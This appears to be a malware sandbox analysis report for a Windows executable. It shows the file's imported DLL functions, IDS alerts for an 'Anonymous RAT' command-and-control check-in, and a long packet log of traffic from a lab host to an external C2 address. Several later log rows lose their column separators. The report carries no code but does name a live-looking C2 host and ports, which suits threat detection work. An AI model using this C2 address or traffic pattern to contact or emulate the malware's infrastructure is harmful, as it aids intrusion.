SHELL32.dll | SHGetFileInfoW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetMalloc, ShellExecuteExW, SHGetSpecialFolderPathW, ShellExecuteW
ole32.dll | CoInitialize, CreateStreamOnHGlobal, CoCreateInstance
OLEAUT32.dll | VariantClear, OleLoadPicture, SysAllocString
MSVCRT.dll | __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, memset, _wcsnicmp, strncmp, malloc, memmove, _wtol, memcpy, free, memcmp, _purecall, ??2@YAPAXI@Z, ??3@YAXPAX@Z, _except_handler3, _controlfp
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-22T09:45:56.226506+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.11.20 | 49767 | 43.250.172.42 | 17091 | TCP
2024-12-22T09:49:10.745908+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.11.20 | 49774 | 43.250.172.42 | 17091 | TCP
2024-12-22T09:50:22.475076+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.11.20 | 49778 | 43.250.172.42 | 17091 | TCP
2024-12-22T09:51:31.826363+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.11.20 | 49781 | 43.250.172.42 | 17092 | TCP
2024-12-22T09:52:33.964927+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.11.20 | 49783 | 43.250.172.42 | 17092 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 22, 2024 09:45:51.721719027 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:52.075526953 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:52.075792074 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:52.430036068 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:52.430062056 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:52.430078983 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:52.430093050 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:52.430207014 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:52.430368900 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:52.784007072 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:52.784028053 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:52.784260988 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:52.784286022 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:52.784303904 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:52.784318924 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:52.784332991 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:52.784346104 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:52.784459114 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:52.784558058 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:52.784616947 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:52.784718037 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:53.137936115 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.137952089 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.137968063 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.137979984 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.138000011 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.138109922 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:53.138159990 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:53.138171911 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.138183117 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.138194084 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.138215065 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.138226032 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.138406038 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:53.138420105 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.138433933 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.138444901 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.138454914 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.138468981 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.138482094 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.138577938 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:53.138751984 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:53.492130995 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.492145061 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.492158890 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.492171049 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.492352962 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.492363930 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.492373943 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.492383957 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.492393970 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.492403984 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.492424011 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:53.492685080 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:53.493578911 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.493593931 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.493773937 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.493788958 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.493848085 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:53.494009018 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.494023085 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.494033098 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.494067907 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:53.494146109 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:53.494911909 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.495115995 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.495121956 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:53.495203018 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.495359898 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.495371103 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.495381117 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.495424986 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.495440960 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:53.495511055 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:53.495585918 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:53.495623112 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.495632887 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.495834112 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:53.495862007 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.495918036 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.495928049 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.495938063 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.495948076 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.496112108 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:53.496159077 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:53.845896959 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.845911026 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.845927000 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.846142054 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:53.846168041 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.846215963 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.846226931 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.846236944 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.846247911 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.846261024 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.846271038 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.846281052 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.846291065 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.846498966 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.846508980 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.846518993 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.846529007 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.846581936 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.846591949 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:53.846592903 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.846931934 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:53.847259998 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.847507954 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.847544909 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.847556114 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.847564936 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.847574949 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.847584009 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.847594023 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.847716093 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.847801924 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.847815037 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.847826958 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.848535061 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.848550081 CET | 18852 | 49766 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:53.848695040 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:53.848695040 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:53.848871946 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:53.848990917 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:53.849595070 CET | 49766 | 18852 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:55.870605946 CET | 49767 | 17091 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:56.226063967 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:56.226314068 CET | 49767 | 17091 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:56.226505995 CET | 49767 | 17091 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:56.582258940 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:56.582715034 CET | 49767 | 17091 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:56.938393116 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:56.942007065 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:56.942090988 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:56.942169905 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:56.942243099 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:56.942349911 CET | 49767 | 17091 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:56.942502975 CET | 49767 | 17091 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:57.297962904 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:57.298038960 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:57.298049927 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:57.298219919 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:57.298228979 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:57.298237085 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:57.298250914 CET | 49767 | 17091 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:57.298295975 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:57.298384905 CET | 49767 | 17091 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:57.298463106 CET | 49767 | 17091 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:57.349483013 CET | 49767 | 17091 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:57.653934956 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:57.653949022 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:57.654203892 CET | 49767 | 17091 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:57.654207945 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:57.654227018 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:57.654237032 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:57.654441118 CET | 49767 | 17091 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:57.654495001 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:57.654509068 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:57.654519081 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:57.654530048 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:57.654670954 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:57.654684067 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:57.654759884 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:57.654764891 CET | 49767 | 17091 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:57.654772043 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:57.654851913 CET | 49767 | 17091 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:57.654954910 CET | 49767 | 17091 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:57.705049038 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:57.705137968 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:57.705405951 CET | 49767 | 17091 | 192.168.11.20 | 43.250.172.42
Dec 22, 2024 09:45:58.009975910 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:58.010055065 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:58.010102987 CET | 17091 | 49767 | 43.250.172.42 | 192.168.11.20
Dec 22, 2024 09:45:58.010251045 CET | 49767 | 17091 | 192.168.11.20 | 43.250.172.42
                                                              Dec 22, 2024 09:45:58.010339022 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.010404110 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.010449886 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.010493040 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.010548115 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.010588884 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.010595083 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.010588884 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.010638952 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.010683060 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.010735989 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.010766983 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.010780096 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.010823011 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.010847092 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.010874033 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.010899067 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.010925055 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.010967970 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.010978937 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.011010885 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.011066914 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.011071920 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.011111975 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.011153936 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.011173964 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.011198997 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.011253119 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.011296034 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.011331081 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.011497974 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.061125994 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.061203003 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.061252117 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.061295986 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.061476946 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.061537981 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.367074013 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.367150068 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.367357969 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.367360115 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.367420912 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.367477894 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.367525101 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.367568970 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.367599964 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.367614031 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.367666960 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.367711067 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.367755890 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.367784023 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.367806911 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.367819071 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.367856026 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.367898941 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.367899895 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.367942095 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.367961884 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.367996931 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368053913 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368129969 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368149996 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.368187904 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368206978 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.368233919 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368277073 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368299961 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.368330956 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368375063 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368416071 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368431091 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.368458986 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368482113 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.368513107 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368539095 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.368557930 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368608952 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368663073 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368710995 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368753910 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368767977 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.368794918 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368819952 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.368850946 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368894100 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368901014 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.368937016 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368963957 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.368985891 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.369029999 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.369071960 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.369107962 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.369113922 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.369159937 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.369174004 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.369246960 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.369281054 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.369299889 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.369357109 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.369400024 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.369434118 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.369442940 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.369487047 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.369537115 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.369580030 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.369623899 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.369632959 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.369688988 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.369792938 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.411788940 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.417284966 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.417494059 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.417558908 CET170914976743.250.172.42192.168.11.20
